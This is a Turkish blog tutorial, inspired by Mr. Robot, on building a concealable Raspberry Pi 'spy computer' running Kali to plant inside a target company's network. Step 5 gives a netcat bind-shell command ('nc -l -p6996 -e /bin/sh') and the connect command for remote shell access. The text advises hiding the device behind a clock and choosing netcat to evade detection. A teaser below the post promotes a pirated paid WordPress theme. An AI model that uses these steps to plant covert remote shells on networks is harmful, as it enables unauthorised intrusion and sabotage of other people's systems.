Küçük Casus Bilgisayar Hazırlama

Mr. Robot dizisinin bir bölümünde Elliot’ın, kötü bir firmanın depolarından birine sızıp, deponun ısıtma soğutma sistemini manipüle ederek bozması gerekiyordu. Bu görev için özel hazırlanmış bir Raspberry Pi kullanmıştı. Ne olduğunu bilmeyenler için söyleyelim, Raspberry Pi, kredi kartı büyüklüğünde, çok ucuz ve fonksiyonel bir mini bilgisayardır. Elliot bu mini ajanı binadaki ağa monte ederek uzaktan gerçekleşecek hack sürecini başlatmış oldu. 



 Şimdi sizlerle, Elliot ve arkadaşlarının yaptığı gibi, Raspberry Pi kullanarak, portatif ve uzaktan kontrol edilebilen bir casus cihaz hazırlayacağız.

1. Adım: Kali’nin ARM versiyonunu indirin


Tekrardan hatırlayalım, Kali , hackerların ve güvenlik uzmanlarının işletim sistemiydi. İlk adım, tabi ki, Raspberry Pi ile uyumlu bir Kali versiyonu edinmek. Raspberry Pi ve birçok mobil cihaz ARM tipi işlemciler kullanırlar, bunun sebebi enerji açısından tasarruflu olmaları ve ısınma problemlerinin az olmasıdır. ARM tipi işlemci dolayısıyla Kali’ninde bu sisteme özel ve uygun olarak derlenmesi gerek.
Neyse ki Offensive Security’deki güzel dostlarımız bizim için bu işi halletmiş durumdalar. 




Offensive Security’nin sitesindeki download bölümüne geçelim ve işletim sistemimizin Raspberry Pi versiyonunu indirelim. İndirdikten sonra herhangi bir zip programıyla dosyaları çıkartalım.

2. Adım: Win32 Disk Imager programını indirip yükleyin



 SourgeForge sitesinden Win32 Disk Imager programını indirip yükleyelim. Bu program sayesinde imaj dosyalarını SD kart veya USB belleklere yazabiliyoruz. Tavsiyem en az 4 gb boyutlu hızlı bir SD kart kullanmanız. Piyasada uygun fiyata bulabilirsiniz.

3. Adım: Disk Imager programını çalıştırın



 Şimdi yüklemiş olduğumuz Disk Imager programını sağ tuş tıklayıp “Yönetici olarak çalıştır” seçeneğiyle açıyoruz.



Image file kısmında, açtığımız Raspberry Pi imajını gösteriyoruz. Device olarak SD kartımızın bulunduğu harf lokasyonunu seçiyoruz. Seçimlerimizi yaptıktan sonra “Write” butonuyla yazdırmaya başlıyoruz. Yazma işlemi sırasında sabırlı olunuz biraz vakit alacaktır.



Eğer LINUX kullanıyorsanız işler biraz daha kolaydır. Herhangi bir şey yüklemenize gerek yok. Linux’te ”dd” komutu mevcut. Bu komut adli bilişim işlemlerinde disk imajı oluşturmak için kullanılır. Gerekli işlemi yapmak için kullanacağımız komutu görelim. Varsayalım ki imajımızın adı Kali-RPI.img olsun, SD kart lokasyonu /dev/sdc ve blok boyutunu (block size) 512k olarak belirlersek, yazacağımız komut şöyle olacaktır:

 kali > dd if =Kali-RPI.img of =/dev/sdc bs=512k

4. Adım: SD kartı Raspberry Pi’a yerleştirelim. 


Yüklemeleri tamamladıktan sonra SD kartı PC den alıp Raspberry Pi’a aktaralım ve boot edelim/başlatalım. Başladıktan sonra sistem, bizleri otomatik olarak komut satırına aktaracak, kullanıcı adı ve şifre isteyecek.

 Username: root

 Password: toor

 yazıp ardından:

 Kali> startx

 yazıyoruz. Bu startx komutu X11 olarakta bilinen X Pencere Sistemi’ni başlatır. Kısaca tanımı yapalım X Pencere Sistemi (X), daha çok GNU/Linux ve Unix benzeri işletim sistemlerinde kullanılan grafik arayüz altyapısıdır. Genel olarak ekrana çizdirme ve kullanıcıdan geribesleme alma işlerini yapan X sunucusunu, ve uygulamaların sunucu ile haberleşme için kullanabileceği X kütüphanesini kapsar. 
Ve işte, Kali yüklü casus Raspberry Pi bilgisayarımız hazır.

5. Adım: Raspberry Pi’da Netcat Listener uygulamasını başlatın



 Geldiğimiz bu aşamada Kali yüklü Raspberry Pi bilgisayarımız var artık ve onu bahsettiğimiz kötü firmanın ağına bağlayabiliriz. Raspberry Pi Ethernet bağlantısına sahiptir, isterseniz de wireless adaptör takabilirsiniz. Bu mini ajanımız çok ufak olduğundan görünmeyecek şekilde her yere monte edilebilir; bilgisayar kasasına, telefon içerisine ve hatta bir duvar saatinin arkasına bile.



Raspberry Pi ağa bağladıktan sonra Netcat Listener uygulamasını başlatabiliriz artık. Uygulama kali içerisinde mevcuttur. Netcat uygulamasını aşağıdaki komutu yazarak başlatıyoruz:

 Kali> nc –l –p6996 –e /bin/sh



Bu komut Raspberry Pi üzerindeki terminale 6996 portundan ulaşım açar.
Artık Elliot, Kali üzerinden Netcat kullanarak Raspberry Pi’a tekrardan ulaşabilir. Bunu yapmak için kullanması gereken komut şudur:

 Kali> nc 192.168.1.105 6996



Bundan sonra ifconfig sorgusuyla Elliot, Raspberry Pi terminalinde olduğunu görebilir. Uyarmak isteriz ki bu komutu kullanmadan Raspberry Pi’a ait ip adresinden emin olmak gerekir.

 Casus Raspberry Pi cihazımıza bağlanmanın, tabi ki başka yöntemleri de vardır. SSH kullanılabilir mesela, SSH, Secure Shell teriminin kısaltılmış halidir, tanımını yapacak olursak; SSH bilgisayar-bilgisayar, bilgisayar-sunucu, sunucu-sunucu bağlantı çeşitleri içerisinde güvenli iletişimi sağlayan bir protokoldür.




Eğer grafiksel arayüz ile bağlanmak istenirse VNC serveri yüklenebilir. Yine tanım yapalım; VNC, özetle herhangi bir ağ sunucusu üzerinde çalışan grafik arayüz uygulamalarına herhangi bir başka ağ üzerindeki bir bilgisayardan kolaylıkla ve hızla erişerek bu uygulamaları kullanabilmemizi ve yönetmemizi sağlayan platform bağımsız bir yapı. Örnek bir VNC bağlantısı resmi aşağıda verilmiştir.




Yukarıda bahsettiğimiz son 2 bağlantı türünü tercih etmeme sebebimiz, kötü niyetli firmamızın ağında tespit edilme olasılıklarının daha yüksek olmasıdır. 

6. Adım: Kasırgalar koparma vakti



 Adımlarımızı tamamladık. Ağdayız, kullanımımıza hazır açık bir Kali var ve bağlantı kurulu halde. Bundan sonraki aşama, zamanı gelince Elliot’ın kasırgalar koparması ve sistemi dağıtması demek…


Comments

  1. UnknownMay 28, 2016 at 9:34 PM

    Çok güzel , anlaşılır sade ve müthiş olmuş , ellerinize sağlık .

    ReplyDelete

Post a Comment

Yorumun Gönderilmiştir..

Popular posts from this blog

Kali Lİnüx Otomatik İP Değiştirme

Image
Merhaba Arkadaşlar, Bugün Sizler Kali Linüx İçin Otomatik İp Değiştirmeyi Ele Alacağız.. Bu Konuya Google'den Vardıysanız Zaten İP'nin ne olduğunu biliyorsunuzdur diye umuyorum, Ancak Ben Yinede Kısa Bir Bilgilendirme Yapayım İP Her Bilgisayarın Ev Adresiymiş Gibi Düşüne Bilirsiniz, Sizin Yerinizi Söyleyen Ve Kaynak Giriş Çıkışlarında Bu Bilgiye Serverlere Verilen Adresiniz İP'dir. İster Telefon Olsun, İster Tablet Yada Bilgisayar Olsun, Eğer İnternet'e Bağlıysanız Mutlaka Bir  İP Adresiniz Vardır, Yani "Ben İp Felan Kullanmak İstemiyorum Hacı, Beni Kasar Böyle Şeyler" Demeyin, Deseniz de Zaten Dediğinizle Kalırsınız :) Tabi Her Sistemin Aşıla Bilir Olduğunu Unutmayalım, Hangi Site Olursa Olsun, Hangi Sistem Olursa Olsun, Hiçbir Zaman " TAMAMEN GÜVENLİ " (DeepWeb İP Farklı, Buna Dahil Etmiyoruz) Diyemeyiz, Öyle Bir Babayiğit Varsa da Aklından Zoru Olduğu Resmi Belgelerle Kanıtlanır Fazla Uzatmadan Konumuz Olan Kali Linüx Otomatik İP Değişt
Read more

Flash Belleği Ram Olarak Kullanma

Image
Flash Belleği Ram Olarak Kullanma Kullanmadığınız Bir Flaş Belleğiniz Var Ve Bir İşe yarasın mı İstiyorsunuz ? Yada Bilgisayarınız Çok Kasıyor, Biraz Hızlandırmak Mı İstiyorsunuz ? Eğer Bu Düşüncelere Sahipseniz, Şuanda Doğru Yazıdasınız. Varsayalım Ki 1 Adet Flaş Belleğimiz Var Ve Alanı 1 GB , Bilgisayarımızın Ram'i de 2 GB Olsun. Favori oyununuzu açıyorsunuz ama kasmalar ve donmalar yaşanıyor. Bunun İçin Size Sadece 1 Adet Usb Flaş Bellek Gerekli . Peki Flaşımızı Nasıl RAM 'a Çevireceğiz ? Beni takip edin ben yolu biliyorum :) Başlayalım :  1- Flaşımızı PC'mize takıyoruz ve Bilgisayarım 'ı Açıyoruz. Takmış Olduğumuz Flaşımızın Üstünde Sağ Tıklayarak Özellikleri Seçiyoruz. Karşımıza Böyle Bir Pencere Çıkacak, Bu Pencerede ReadyBoos Sekmesine Tıklıyoruz Eğer "Bu Aygıtı ReadyBoost'a Ada Dersek, Flaşımızın Tamamı Ram Olarak Kullanılacaktır. Ama Yok Ben Belirli Bir Kısmını Ram Olarak Kullanmak İstiyorum Derseniz " Bu Aygı
Read more

Ecce Pure Teması İndir

Image
Merhaba Arkadaşlar, Bugün Sizlere Çoğu Kişinin Peşine Olduğu " Olum Temaya Baksana Be! Muhteşem Anasını Satayım " Dediği Bir Temayı Paylaşacağım :) Aslında Paylaşsam mı Bilemiyorum :) Scriptin Normalde Ücreti 70TL , Ama Şimdi Bunu İsteyip de Alamayan Kişiler Vb Olanlar Oluyor ( Benim Gibi :) ) Bende Bu Yüzden Paylaşıyorum. Robin Hood Gibi, Zenginden Alıp Fakire Dağıtma Misali , O Robin Hood'muydu Onu Da Tam Olarak Bilemiyorum , Aranızda Bilen Varsa Bi Zahmet Yorumda Belirtsin , 70 TL'lik Temayı Ücretsiz Dağıtıyoruz Arkadaş, Bir Yorumu Çok Görmeyin :)  Yıl Olmuş 2016'ya 1 Ay Kala , Hala "Wordpress'e Tema Yüklemeyi Bilmeyen Kişiler Var mı Bilmiyorum" Demiyorum, Bize Her Ne Kadar Basit Gelse de, Bizde Başta Zorlandık , Aradık, Bunu Bi Kabul Edelim Şimdi :) Aslında Bu Wp Ye Tema Yüklemeyle İlgili Bir Yazı Yazıp, Onu Her WP TEMA Yazısında Paylaşmayı Düşünüyorum, Her Defasında Anlat Anlat Nereye Kadar Demi :) Wordpress'e Tema Yükl
Read more